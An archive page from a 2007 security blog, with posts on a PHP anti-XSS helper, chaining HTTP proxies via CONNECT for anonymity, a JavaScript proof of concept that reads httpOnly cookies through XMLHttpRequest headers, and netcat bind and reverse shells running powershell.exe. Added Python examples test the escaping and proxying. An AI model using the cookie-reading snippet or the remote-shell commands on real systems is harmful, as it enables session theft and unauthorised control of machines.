Archive for August, 2007|Monthly archive page

rudimentary anti-x(ross)s(ite)s(cripting)

The reason I present the following piece of code is that not many people properly sanitize user input; as a consequence SQL injection or XSS may happen, which may or may not be dangerous.

I’ve seen many examples where people sanitized the input against SQL injection, but because they forgot, or didn’t think it was serious enough, they didn’t filter it against XSS. There are many ways to protect against XSS, but not every one of them is fully protective.

There is no dedicated anti-XSS function in PHP, as there is for SQL injection (in the case of MySQL, the escaping function that comes with the extension). I’ve seen protections built on PHP’s HTML stripping and encoding functions; this type of protection can help keep away the script kiddies ;)

function antixss($input) {
   // encode &, <, >, " and ' so the value is inert in HTML text and inside quoted attributes
   return htmlentities($input, ENT_QUOTES, "utf-8");
}

Looks pretty simple, and also pretty easy to implement, as a protection:

$check = antixss($_POST['field']);   // the same for values taken from $_GET, $_REQUEST, $_COOKIE or $_SERVER

Hope it was a useful article for all of you… maybe because, besides learning that XSS protection is needed, even one as rudimentary as the above, you may also have learned that XSS attack vectors can be found in $_COOKIE and in the User-Agent request header exposed through $_SERVER….
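htmlentities() with ENT_QUOTES neutralises a value placed in HTML text or inside a quoted attribute, and nothing else: an unquoted attribute, a javascript: URL or an inline script block each need a different encoding. The block below is an added example and not code from the original post: it reproduces the same escaping with Python's html.escape(quote=True), renders constructed payloads into three constructed templates, and asks an HTML parser whether a new tag or an on* handler appeared.

```python
# Added example (not from the original post): the escaping done by the PHP
# antixss() helper above, reproduced with html.escape() and rendered into three
# constructed HTML contexts to show where it is enough and where it is not.
import html
from html.parser import HTMLParser

def antixss(value):
    """Python stand-in for htmlentities($input, ENT_QUOTES, 'utf-8'): encodes
    & < > " and ' (htmlentities also encodes non-ASCII, irrelevant here)."""
    return html.escape(value, quote=True)

# Three places a PHP page might echo the "sanitised" value into.
TEMPLATES = {
    "text":          "<p>Hello {}</p>",                  # HTML text node
    "quoted_attr":   '<input type="text" value="{}">',   # double-quoted attribute
    "unquoted_attr": "<input type=text value={}>",       # unquoted attribute
}

# Constructed attack strings, one per context. The last one needs none of the
# five characters antixss() encodes: a space and '=' add a new attribute.
PAYLOADS = {
    "text":          "<script>alert(1)</script>",
    "quoted_attr":   '" onmouseover="alert(1)',
    "unquoted_attr": "x onmouseover=alert(1)",
}

class _TagCollector(HTMLParser):
    """Records (tag, attributes) for every start tag a browser would see."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def render(context, value):
    """Echo the sanitised value into the chosen template."""
    return TEMPLATES[context].format(antixss(value))

def injected(markup):
    """True if the markup contains a <script> tag or any on* event handler,
    i.e. the user-controlled value escaped the context it was put in."""
    parser = _TagCollector()
    parser.feed(markup)
    return any(tag == "script" or any(name.startswith("on") for name in attrs)
               for tag, attrs in parser.tags)

def check_contexts():
    """Which of the three contexts does antixss() actually protect?"""
    return {ctx: injected(render(ctx, PAYLOADS[ctx])) for ctx in TEMPLATES}

if __name__ == "__main__":
    for ctx, broken in check_contexts().items():
        print(f"{ctx:14s} {'INJECTED' if broken else 'safe'}  {render(ctx, PAYLOADS[ctx])}")
```

The text and quoted-attribute contexts come out clean, the unquoted attribute does not; the fix on the template side is to quote every attribute, after which the same escaping is sufficient for that context.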

quote: Javascript is evil

And whom am I quoting? Our little JavaScript “Devil” friend SirDarckCat, who is pulling it off again by writing what seems to be a three-part series about JavaScript!

For whom can JavaScript be evil? For you, your server and your local files…

Read the first article from the series at: http://sirdarckcat.blogspot.com/2007/08/javascript-is-just-evil-for-you-part-i.html

What should we do against it? Answer -> http://noscript.net/

Proxy’s for fun and anonymity – vol. 2

In this second “volume” we will discuss raw HTTP/SSL tunneling… hope you’ll like this part more than the first one.

raw HTTP proxy

What we need is a telnet-capable program; I personally use PuTTY and will use it for this example. I recommend a telnet client other than the one built into Windows. How do we proxy? The same way we initiate an HTTP request to a server, except that we open the connection to the proxy and put the complete URL in the request line, together with a Host header:

putty -raw [proxy] [port]

GET http://www.google.com/ HTTP/1.1
Host: www.google.com
[Enter]

The empty line ([Enter]) ends the headers; the proxy then fetches the page and returns the response on the same connection.

raw SSL tunnel

CONNECT is the request method proxies offer for SSL tunneling: instead of fetching a URL, the proxy opens a raw TCP connection to the requested host:port, answers with “HTTP/1.0 200 Connection established”, and from then on relays bytes in both directions without interpreting them. If the proxy allows CONNECT to ports other than 443, arbitrary protocols can be run through it; this is how SSH gets tunneled through an HTTP proxy (CONNECT to the SSH server’s port instead of 443). An example:

putty -raw [proxy] [port]

CONNECT www.google.com:443 HTTP/1.0
Host: www.google.com
[Enter]

After the 200 reply everything you type goes straight to www.google.com:443, so the next bytes have to be a TLS handshake rather than HTTP; the proxy sees only the destination host and port.

Proxy Chaining

There are many types of proxy chaining, but I am going to discuss the HTTP/SSL type, because it is the main theme of this article. What do you need? CONNECT-capable proxies, and one CONNECT request per hop. Each CONNECT names the next proxy in the chain and is answered by the proxy you reached in the previous step, so wait for its “200 Connection established” before sending the next one; the final GET is handled by the last proxy as a normal absolute-URI request:

putty -raw [proxy1] [port]

CONNECT proxy2:80 HTTP/1.0
[Enter]           (proxy1 answers 200 and from now on relays to proxy2)

CONNECT proxy3:3128 HTTP/1.0
[Enter]           (answered by proxy2, through the tunnel)

CONNECT proxy4:8080 HTTP/1.0
[Enter]           (answered by proxy3)

GET http://www.google.com/ HTTP/1.1
Host: www.google.com
[Enter]           (proxy4 fetches the page; the reply comes back through every hop)

The web server’s connection comes from proxy4, and each intermediate proxy sees only the host:port of the next hop.

Hit me with resources!

Like in vol. 1, I will give you some useful resources with which you can improve yourself in the proxying field: SSH Proxy, HTTP RFC, HTTP over TLS.
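The two request forms and the chaining described above, as an added Python example that is not code from the original post: a toy proxy that handles absolute-URI GET and CONNECT, a constructed origin server standing in for www.google.com, and a client that CONNECTs from proxy1 to proxy2 and then sends the final GET. Everything listens on 127.0.0.1 ports handed out by the OS, so it runs offline; the response body is made up for the demo.

```python
# Added example (not from the original post): toy HTTP proxy with CONNECT, an
# origin stub, and a client that chains two proxies. Localhost only.
import socket
import threading

CRLF = b"\r\n"

def read_head(sock):
    """Read a request/response head up to and including the blank line."""
    buf = b""
    while CRLF + CRLF not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf

def read_all(sock):
    """Read until the peer closes the connection (HTTP/1.0 style)."""
    chunks = []
    while data := sock.recv(4096):
        chunks.append(data)
    return b"".join(chunks)

def one_way(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def proxy_handler(conn):
    """Toy proxy for the two request forms from the post: absolute-URI GET
    (fetched on the client's behalf) and CONNECT (blind TCP tunnel)."""
    line = read_head(conn).split(CRLF, 1)[0].decode(errors="replace")
    method, target = (line.split(" ") + ["", ""])[:2]
    if method == "CONNECT":
        host, _, port = target.rpartition(":")
        with socket.create_connection((host, int(port))) as upstream:
            conn.sendall(b"HTTP/1.0 200 Connection established" + CRLF + CRLF)
            t = threading.Thread(target=one_way, args=(conn, upstream), daemon=True)
            t.start()
            one_way(upstream, conn)   # relay until both directions hit EOF
            t.join()
    elif method == "GET" and target.startswith("http://"):
        hostport, _, path = target[len("http://"):].partition("/")
        host, _, port = hostport.partition(":")
        with socket.create_connection((host, int(port or 80))) as upstream:
            upstream.sendall(f"GET /{path} HTTP/1.0\r\nHost: {hostport}\r\n\r\n".encode())
            conn.sendall(read_all(upstream))
    else:
        conn.sendall(b"HTTP/1.0 400 Bad Request" + CRLF + CRLF)

ORIGIN_BODY = b"hello from origin"   # constructed reply, stands in for www.google.com

def origin_handler(conn):
    read_head(conn)
    conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: "
                 + str(len(ORIGIN_BODY)).encode() + CRLF + CRLF + ORIGIN_BODY)

def start_server(handler):
    """Listen on a free 127.0.0.1 port, one thread per connection; return the port."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)

    def handle(conn):
        with conn:
            handler(conn)

    def loop():
        while True:
            conn, _ = listener.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return listener.getsockname()[1]

def connect_hop(sock, host, port):
    """Send one CONNECT over the current tunnel and insist on a 200 reply."""
    sock.sendall(f"CONNECT {host}:{port} HTTP/1.0\r\nHost: {host}:{port}\r\n\r\n".encode())
    status = read_head(sock).split(CRLF, 1)[0].decode(errors="replace")
    if status.split(" ")[1:2] != ["200"]:
        raise RuntimeError(f"CONNECT {host}:{port} failed: {status!r}")

def fetch_through_chain(proxies, url_host, url_port):
    """TCP-connect to proxies[0], CONNECT hop by hop to every further proxy,
    then send the absolute-URI GET the last proxy fetches. Returns the body."""
    with socket.create_connection(proxies[0]) as sock:
        for host, port in proxies[1:]:
            connect_hop(sock, host, port)
        sock.sendall(f"GET http://{url_host}:{url_port}/ HTTP/1.1\r\n"
                     f"Host: {url_host}:{url_port}\r\nConnection: close\r\n\r\n".encode())
        return read_all(sock).partition(CRLF + CRLF)[2]

def demo():
    """client -> proxy1 -CONNECT-> proxy2 -GET-> origin, all on localhost."""
    origin = start_server(origin_handler)
    proxy1 = start_server(proxy_handler)
    proxy2 = start_server(proxy_handler)
    return fetch_through_chain([("127.0.0.1", proxy1), ("127.0.0.1", proxy2)],
                               "127.0.0.1", origin)
```

Calling demo() returns the origin body after it has travelled origin → proxy2 → proxy1 → client; a third hop is one more tuple in the proxies list, since each CONNECT after the first is answered by the previous hop through the tunnel already open.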

Proxy’s for fun and anonymity – vol. 1

Oh no, proxy-related material!

Yeah, I know the world is full of proxies, but this ain’t gonna be another tutorial on how to change/set a proxy in Firefox/IExplorer/Opera/etc/passwd… this article is going to lead you straight to the basics of proxies and how to work with them over raw TCP/IP connections.

But the last part I mentioned is only going to be a part of vol. 2, because I don’t have the time to write all of it at once.

What is a proxy?

A proxy is basically a gateway, a machine or a piece of software that acts as a tunnel… no more, no less (better a short description than a long one). Basic flow of a request through a proxy:


client -> proxy -> web server -> proxy -> client

How many types can a proxy be?

As far as I know there are 3 types of proxies:

  1. Transparent – passes your real IP on to the website (typically in an X-Forwarded-For header), so if the website asks for it, it gets it.
  2. Anonymous – hides your IP, but still announces itself as a proxy (for example with a Via header), so the website knows it is talking to a proxy.
  3. Highly Anonymous – the so-called l33t (elite) proxies: neither your IP nor any hint that a proxy is in the path reaches the website. Nobody installs this kind of proxy on his machine on purpose; they are found in the wild due to misconfiguration.

Thing to note: a proxy is not only for anonymity. On various occasions you will get a “page not found” even though you know the page is online; this happens when a link in the Internet chain “dies”, and you have to choose another route to the desired website.

What is not worth speaking of…

SOCKS 4/5 proxies and Wingates. Why? They are very rare nowadays, and nobody uses them. They were a big thing in the mid ’90s, when IRC was more of a lifestyle.

Extra proxy stuff

You should also know that besides normal proxies, a couple of CGI/PHP proxies have appeared… an illustrative example you can find here.

Proxy resources!

I will not make you a list of proxy resources here, because there are so many online, but I will give you a link to an article that I think offers the biggest proxy resource on earth -> huge proxy resource!

Check your proxies!

Many times proxies don’t live long in the wild, and here I mean anonymous and highly anonymous proxies. I recommend storing your proxies in a flat file, one per line, in the following format:


proxy_address:port

ex:

123.12.65.2:8080

And check which proxies work and which don’t with the proxy-checking script written in PHP, called PHProxy: download
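An added Python example (not from the original post, and not the PHProxy script linked above) that works with the flat-file format just described: it parses and de-duplicates proxy_address:port lines, probes each entry with a TCP connect, and sorts a proxy into the three classes from this article according to the request headers a page you control received through it. The sample list and the header dictionaries are constructed; X-Forwarded-For and Via are the usual headers, but a given proxy may use others.

```python
# Added example (not from the original post): checker for the proxy_address:port
# flat-file format above. Sample list and header sets are constructed.
import ipaddress
import socket

SAMPLE_LIST = """\
# constructed sample list: one good entry, a duplicate, and two junk lines
123.12.65.2:8080
10.0.0.7:3128
not-a-proxy
999.1.1.1:80
123.12.65.2:8080
"""

def parse_proxy_list(text):
    """Return (valid, rejected): valid is the de-duplicated list of (ip, port)
    in file order, rejected the lines that are not a well-formed address:port."""
    valid, rejected, seen = [], [], set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        host, sep, port = line.rpartition(":")
        try:
            if not sep:
                raise ValueError("no port")
            entry = (str(ipaddress.ip_address(host)), int(port))
            if not 1 <= entry[1] <= 65535:
                raise ValueError("bad port")
        except ValueError:
            rejected.append(line)
            continue
        if entry not in seen:
            seen.add(entry)
            valid.append(entry)
    return valid, rejected

# Headers a proxy may add to the request it forwards. The first group carries
# the client's address; the second merely reveals that a proxy is in the path.
REVEALING = ("x-forwarded-for", "x-real-ip", "client-ip", "forwarded")
PROXY_MARKERS = ("via", "x-proxy-id", "proxy-connection")

def classify(headers_seen, client_ip):
    """Classify a proxy from the request headers a page you control received
    through it (headers_seen) and your real address (client_ip)."""
    lower = {k.lower(): v for k, v in headers_seen.items()}
    if any(client_ip in lower.get(h, "") for h in REVEALING):
        return "transparent"          # real IP leaked in a forwarding header
    if any(h in lower for h in REVEALING + PROXY_MARKERS):
        return "anonymous"            # IP hidden, but the proxy announces itself
    return "highly anonymous"         # nothing in the request points at a proxy

def is_alive(ip, port, timeout=3.0):
    """Plain TCP connect with a timeout: most entries on public lists are dead."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False

def check_list(text, probe=is_alive):
    """Parse the list and probe every valid entry; probe is injectable so the
    function can be exercised offline with a stub."""
    valid, rejected = parse_proxy_list(text)
    return {f"{ip}:{port}": probe(ip, port) for ip, port in valid}, rejected

if __name__ == "__main__":
    alive, rejected = check_list(SAMPLE_LIST)
    print("alive:", alive)
    print("rejected:", rejected)
```

A TCP connect only proves something is listening; to get the classification you still have to send a request through the proxy to a page of yours that echoes the headers it received, and feed that header set to classify().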

EOF! till vol. 2

The history of hacking

Maybe many of you don’t know the real history of hacking, but this is a series I recommend to everybody interested in security… It is a must-see, just to know why we all do what we do… The first video of the six-part series is displayed below, along with links to the following ones. Check it out ;)

1-2-3-4-5-6

P.S.: Hope I got the right series… If not, you’ll have to search for a while :þ

Website Anatomy

I’ve started working on a project, on my own of course, by which I am trying to create a unique tool. One of a kind! The one and only! NOT!

What am I going to do? Basically a reconnaissance tool that will give you the website’s folder structure, pages, forms and that kind of thing.

What will it be good for? For those cases when you want to look over a website to find possibly vulnerable forms… Normally this could take a couple of minutes while you look through the pages, check the code and so on. With this tool, seconds, and minutes to spare… for those moments when you get lazy, this tool will be developed ;)

httpOnly vs. XmlHttpRequest

I remember well a couple of days ago when I read about this subject on ha.ckers.org; at first I thought it would be secure, but after the first three lines I realized that the only difference it made was the length of the XSS code.

For those who have trouble finding the equivalent of document.cookie in Ajax, here is the PoC (answer):


var doc;
try { doc = new XMLHttpRequest(); } catch(e) {}
if (!doc) try { doc = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) {}
if (!doc) try { doc = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {}

// Only works in browsers that expose Set-Cookie through getAllResponseHeaders(),
// and only if the server (re)sends the cookie on this response.
doc.onreadystatechange = function() {
  if (doc.readyState == 4) {
    var hidden = "";
    if (doc.status == 200) {
      // one "Name: value" line per header; strip the CR before splitting on LF
      var headers = doc.getAllResponseHeaders().replace(/\r/g, "").split("\n");
      for (var i = 0; i < headers.length; i++) {
        if (headers[i].toLowerCase().indexOf("set-cookie:") != 0) continue;
        var off1 = headers[i].indexOf(" ") + 1;   // skip "Set-Cookie: "
        var off2 = headers[i].indexOf(";");       // stop before the attributes (path, expires, HttpOnly)
        if (off2 == -1) off2 = headers[i].length;
        var cookie = headers[i].substring(off1, off2);   // name=value
        hidden = hidden + cookie + " ";
      }
    }
    alert("httpOnly cookie: " + hidden);
  }
};

// HEAD is enough: the cookie arrives in the headers, no body needed
doc.open("HEAD", document.location, true);
doc.send(null);

Copy-paste the above snippet of code, because in the “years” to come maybe it will be the only way to get cookies.

NetCat & PowerShell -> disaster

Of course I’m being a little too dramatic; after so many days of admiring the new Windows shell, and even after writing an article about it on darknet, the problems started to roll in. Actually I know of just this single issue, but I told you I’m too dramatic. One little note before debating the problem: I do not blame anybody for this issue, except those MS programmers… kidding… you guys just continue developing PowerShell and people like me will be looking for bugs instead of you :)

Bugs – here they come

How did it all begin? I was playing with netcat when I got the great idea to use PowerShell as its Windows shell, instead of the old command prompt. Everything was OK until I connected to my listening netcats… by the way, I used it as a bindshell and as a reverse shell, like:


PoC 1 Bindshell

nc -l -e powershell.exe -t -p 666    //bindshell
telnet localhost 666                 //to connect

PoC 2 Reverse Shell

nc -l -p 666                         //listener
nc -e powershell.exe localhost 666   //to connect

Didn’t you understand?

What is really happening is that through PowerShell the bindshell has become a reverse shell and the reverse shell a bindshell. Confusing? I don’t think so; just take a look at how the response is being carried: I mean the less useful result goes where it should go, and the awaited result goes where it shouldn’t go…. but what am I talking about here; if you have ever used netcat, you’ll know what I am talking about…